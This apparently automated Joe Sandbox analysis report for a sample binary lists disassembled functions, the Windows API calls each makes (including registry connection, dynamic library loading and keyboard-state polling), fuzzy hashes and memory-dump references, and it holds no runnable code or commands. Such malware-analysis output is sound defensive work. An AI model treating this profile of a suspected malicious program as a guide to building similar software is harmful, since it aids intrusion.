                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                            • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                            • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                            • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                            Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                            • __freefls@4.LIBCMT ref: 00415209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                            • String ID:
                                                            • API String ID: 442100245-0
                                                            • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                            • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                            • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                            • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                            Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                            • _wcslen.LIBCMT ref: 0045F94A
                                                            • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 621800784-4108050209
                                                            • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                            • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                            • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                            • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                            Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SetErrorMode.KERNEL32 ref: 004781CE
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • SetErrorMode.KERNEL32(?), ref: 00478270
                                                            • SetErrorMode.KERNEL32(?), ref: 00478340
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                            • String ID: \VH
                                                            • API String ID: 3884216118-234962358
                                                            • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                            • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                            • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                            • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                            Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                            • IsMenu.USER32(?), ref: 0044854D
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                            • DrawMenuBar.USER32 ref: 004485AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert
                                                            • String ID: 0
                                                            • API String ID: 3076010158-4108050209
                                                            • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                            • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                            • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                            • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                            Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                            • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1589278365-1403004172
                                                            • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                            • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                            • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                            • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                            Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Handle
                                                            • String ID: nul
                                                            • API String ID: 2519475695-2873401336
                                                            • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                            • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                            • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                            • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                            Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Handle
                                                            • String ID: nul
                                                            • API String ID: 2519475695-2873401336
                                                            • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                            • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                            • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                            • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                            Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: SysAnimate32
                                                            • API String ID: 0-1011021900
                                                            • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                            • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                            • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                            • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                            Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                              • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                              • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                              • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                              • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                            • GetFocus.USER32 ref: 0046157B
                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                            • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                            • __swprintf.LIBCMT ref: 00461608
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                            • String ID: %s%d
                                                            • API String ID: 2645982514-1110647743
                                                            • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                            • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                            • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                            • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                            Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                            • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                            • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                            • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                            Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                            • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                            • String ID:
                                                            • API String ID: 3488606520-0
                                                            • Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                            • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                            • Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                            • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                            Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 15295421-0
                                                            • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                            • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                            • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                            • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                            Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                            • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                            • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$FreeLoad
                                                            • String ID:
                                                            • API String ID: 2449869053-0
                                                            • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                            • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                            • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                            • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                            Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004563A6
                                                            • ScreenToClient.USER32(?,?), ref: 004563C3
                                                            • GetAsyncKeyState.USER32(?), ref: 00456400
                                                            • GetAsyncKeyState.USER32(?), ref: 00456410
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
